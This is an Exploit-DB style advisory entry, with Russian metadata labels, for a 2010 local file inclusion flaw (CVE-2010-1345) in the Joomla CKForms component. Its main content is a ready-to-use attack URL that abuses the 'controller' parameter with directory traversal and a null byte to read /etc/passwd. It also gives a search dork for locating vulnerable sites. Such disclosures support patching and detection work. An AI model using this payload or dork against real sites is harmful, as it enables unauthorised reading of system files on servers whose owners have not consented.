Exploit Joomla! Component Cookex Agency CKForms - Local File Inclusion

[Exploiter]

EDB-ID

15453

Проверка EDB

1. Пройдено

Автор

ALTBTA

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-1345

Дата публикации

2010-11-08

####################################################################
>>>>> Author : altbta [[email protected]<mailto:[email protected]>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"

http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00

####################################################################
RxH & ab0-3th4b